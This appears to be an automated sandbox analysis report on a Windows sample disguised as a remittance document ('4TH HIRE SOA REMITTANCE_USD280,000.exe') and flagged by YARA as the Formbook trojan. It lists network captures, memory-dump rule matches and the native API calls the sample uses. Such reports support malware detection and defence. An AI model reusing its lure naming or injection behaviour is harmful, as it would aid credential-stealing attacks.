            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Mon, 27 May 2024 10:44:03 GMT | Connection: close | Content-Length: 315 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Mon, 27 May 2024 10:44:05 GMT | Connection: close | Content-Length: 315 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Mon, 27 May 2024 10:44:09 GMT | Connection: close | Content-Length: 315 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Mon, 27 May 2024 10:44:11 GMT | Connection: close | Content-Length: 315 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 27 May 2024 10:44:17 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 27 May 2024 10:44:20 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 27 May 2024 10:44:22 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 27 May 2024 10:44:25 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Mon, 27 May 2024 10:44:32 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Set-Cookie: PHPSESSID=k9d4iv5dbh9ou7ovo21hqi26vc; path=/; domain=lesfleursdeceline.be; HttpOnly | Expires: Thu, 19 Nov 1981 08:52:00 GMT | Cache-Control: no-store, no-cache, must-revalidate | Pragma: no-cache | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Mon, 27 May 2024 10:44:35 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Set-Cookie: PHPSESSID=7uhsc6i4svlnjts9umv7lmifdb; path=/; domain=lesfleursdeceline.be; HttpOnly | Expires: Thu, 19 Nov 1981 08:52:00 GMT | Cache-Control: no-store, no-cache, must-revalidate | Pragma: no-cache | Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:44:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=fi8non3nopf054137q44k8r9f5; path=/; domain=lesfleursdeceline.be; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzipData Raw: 33 33 32 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d eb 72 1b c7 92 e6 ef e3 88 79 87 36 76 6c 91 2b 02 e0 4d 17 52 84 bc 34 45 59 9c 11 25 8e 48 d9 e7 1c 49 83 68 34 1a 40 5b 40 37 d4 17 52 b4 ac f7 19 bf c6 fa c5 f6 fb 32 ab ba ab 71 21 61 1f 9d 89 dd 88 75 58 44 a3 ab 2a 2b 2b 2b 2b 33 2b 33 ab 70 f0 f5 93 97 47 17 7f 3b 3b f6 46 f9 64 fc f8 ab 03 7e 78 c1 d8 cf b2 4e 23 4e 9a 3f 67 0d 6f 9a 86 83 e8 63 a7 91 0c f7 51 2b 9f 66 fb ed 76 32 9c b6 26 61 3b ce fe 47 c3 1b fb f1 b0 d3 18 a4 0d 36 0f fd fe e3 83 71 14 bf f7 d2 70 dc 69 a0 6d 90 c4 71 18 e4 0d 6f 04 38 9d 86 85 d0 df ea 47 db e3 5f 8a d1 de 83 c1 68 bb 15 8c 93 a2 3f 48 93 38 6f c5 21 2a 07 69 92 65 49 1a 0d a3 78 35 78 03 34 cd 5a c3 2c f7 f3 28 68 05 c9 64 06 c6 24 cc 7d 2f 18 f9 69 16 e6 9d 46 91 0f 9a 0f 1b 2e e4 08 78 fe 21 1c db c1 38 0a e3 bc 1d 4d 86 ed 81 7f c9 f6 59 3b eb 35 cd 73 2b bb 1c 7e 37 1d 75 1e 6e ef 6d 86 3b f7 fc bd 5e c3 cb af a7 61 a7 11 4d fc 61 d8 46 f1 dd 8f 93 71 c3 cb a2 5f 42 10 db 8f af ff a9 f8 34 b7 ee ff 51 94 b6 ee 7f dc ba ff 4f 45 aa 05 aa cd 10 c9 9d 13 7f 3a 1d 87 cd 3c 29 82 51 f3 8b cf cf cd 5d ff 77 74 f7 95 87 ff 0e 84 31 b9 2a 9a e1 87 22 ba ec 34 fe da 7c 7d d8 3c 4a 26 53 70 72 6f 1c 82 8f c1 da e0 b4 4e e3 e4 b8 13 f6 87 21 16 9a b4 cc a3 7c 1c 3e de dd dc f5 9a de 19 78 ca 8b 93 d8 cb d3 a4 b8 fc fd b7 d0 db df f7 9e 87 99 37 18 87 45 9a 79 fd d0 0b 42 ac cb f0 a0 ad cd 9c ce 63 7f 02 b6 bc 8c c2 ab 69 92 72 ed d9 fe ae a2 7e 3e ea f4 43 30 77 d8 94 2f 1b 51 1c e5 91 3f 6e 66 81 3f 0e 3b 5b 16 15 19 84 c2 99 64 9c b6 28 
00 f6 49 dc cc fd 69 73 14 0d 47 63 fc 73 41 c7 89 6d 2a c2 e2 0f c8 86 f6 20 1a 87 59 7b 73 17 ff 4f f9 2f 7a 78 af 15 64 d9 0c 1f 79 93 b0 1f f9 94 40 51 8c 8e 45 1a 65 f9 35 9a 8e 42 08 18 43 c2 3f d9 f9 ce a0 bd 33 d8 e3 bf cb cb c1 0d 9d 67 41 1a 86 b1 e7 c7 7d 6f 6d 12 c5 4a c3 fd ad 4d fe 17 4e d6 e7 d1 f2 fa 7e ee 37 55 4e 04 1f 1a 5e 3f ca 7c f0 40 df 45 77 76 28 7f 44 b0 1a e2 ed 04 ed 9d e0 8a ff 06 e9 fb 05 f8 bb 8b d0 21 da 9f e9 69 bb bd b3 1d f1 df fd 7b 1f 16 f4 64 a7 69 31 a5 76 1e b4 ee 91 4e 5f 0e 9f dd bd f6 ee de 47 fe 9b 14 8b 46 ae 13 70 15 f7 bb 41 32 4e d2 6e 16 8c c2 49 d8 25 cf 75 1a 5f 10 8f ad bd f6 d6 de 84 ff 2e 83 fe 22 ba 08 23 cc e1 d1 0f b3 f7 79 32 b5 f8 ac 46 bd 92 8b be e8 08 b6 d3 f6 76 da e7 bf 5f 7e 81 fe 9e 5f 80 e5 08 fc 7e 1f 42 e3 32 34 24 fd f2 b4 7c d0 de 7a f0 90 ff 92 78 e7 46 4c b0 b0 92 61 ea 4f 47 d7 96 82 5f 8e b3 c0 e5 db d1 15 ff fd 72 bd 50 20 95 f4 70 b0 f8 02 f3 89 95 13 4d f3 c7 Data Ascii: 3323}ry6vl+MR4EY%HIh4@[@7R
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:44:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=4bo93gfecst1n2q9af31s2qieb; path=/; domain=lesfleursdeceline.be; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 63 6c 69 65 6e 74 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 73 2f 73 62 2d 66 61 76 69 63 6f 6e 2e 73 76 67 3f 70 68 3d 38 32 39 30 65 33 35 61 39 62 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 61 6e 79 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 63 6c 69 65 6e 74 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 73 2f 73 62 2d 66 61 76 69 63 6f 6e 2d 31 36 2e 73 76 67 3f 70 68 3d 38 32 39 30 65 33 35 61 39 62 22 20 74 79 70 65 3d 22 69 
6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 63 6c 69 65 6e 74 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 73 2f 73 62 2d 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 70 68 3d 38 32 39 30 65 33 35 61 39 62 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 63 6c 69 65 6e 74 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 73 2f 73 62 2d 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 70 68 3d 38 32 39 30 65 33 35 61 39 62 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 63 6c 69 65 6e 74 2f 69 6d 67 2f Data Ascii: 8000<!DOCTYPE html>

            E-Banking Fraud

            Source: Yara match, File source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6ab0000.6.raw.unpack, .cs, Large array initialization: array initializer size 27103
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.2854940.0.raw.unpack, .cs, Large array initialization: array initializer size 27103
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_0042B0A3 NtClose, 9_2_0042B0A3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2B60 NtClose, LdrInitializeThunk, 9_2_017D2B60
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2DF0 NtQuerySystemInformation, LdrInitializeThunk, 9_2_017D2DF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2C70 NtFreeVirtualMemory, LdrInitializeThunk, 9_2_017D2C70
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D35C0 NtCreateMutant, LdrInitializeThunk, 9_2_017D35C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D4340 NtSetContextThread, 9_2_017D4340
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D4650 NtSuspendThread, 9_2_017D4650
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2BF0 NtAllocateVirtualMemory, 9_2_017D2BF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2BE0 NtQueryValueKey, 9_2_017D2BE0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2BA0 NtEnumerateValueKey, 9_2_017D2BA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2B80 NtQueryInformationFile, 9_2_017D2B80
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2AF0 NtWriteFile, 9_2_017D2AF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2AD0 NtReadFile, 9_2_017D2AD0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2AB0 NtWaitForSingleObject, 9_2_017D2AB0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2D30 NtUnmapViewOfSection, 9_2_017D2D30
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2D10 NtMapViewOfSection, 9_2_017D2D10
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2D00 NtSetInformationFile, 9_2_017D2D00
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2DD0 NtDelayExecution, 9_2_017D2DD0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2DB0 NtEnumerateKey, 9_2_017D2DB0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2C60 NtCreateKey, 9_2_017D2C60
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2C00 NtQueryInformationProcess, 9_2_017D2C00
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2CF0 NtOpenProcess, 9_2_017D2CF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2CC0 NtQueryVirtualMemory, 9_2_017D2CC0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2CA0 NtQueryInformationToken, 9_2_017D2CA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2F60 NtCreateProcessEx, 9_2_017D2F60
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2F30 NtCreateSection, 9_2_017D2F30
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2FE0 NtCreateFile, 9_2_017D2FE0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2FB0 NtResumeThread, 9_2_017D2FB0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2FA0 NtQuerySection, 9_2_017D2FA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2F90 NtProtectVirtualMemory, 9_2_017D2F90
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2E30 NtWriteVirtualMemory, 9_2_017D2E30
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2EE0 NtQueueApcThread, 9_2_017D2EE0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2EA0 NtAdjustPrivilegesToken, 9_2_017D2EA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D2E80 NtReadVirtualMemory, 9_2_017D2E80
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D3010 NtOpenDirectoryObject, 9_2_017D3010
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D3090 NtSetValueKey, 9_2_017D3090
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D39B0 NtGetContextThread, 9_2_017D39B0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D3D70 NtOpenThread, 9_2_017D3D70
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe, Code function: 9_2_017D3D10 NtOpenProcessToken, 9_2_017D3D10
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2082504139.0000000002831000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2084812908.0000000003A6E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameTyrone.dll8 vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2081039234.000000000094E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2092249353.0000000006B40000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameTyrone.dll8 vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2093278786.0000000006F6D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2091903672.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2333103753.000000000188D000.00000040.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2332718421.0000000001307000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameWINVER.EXEj% vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe; Binary or memory string: OriginalFilenameqUJT.exeB vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
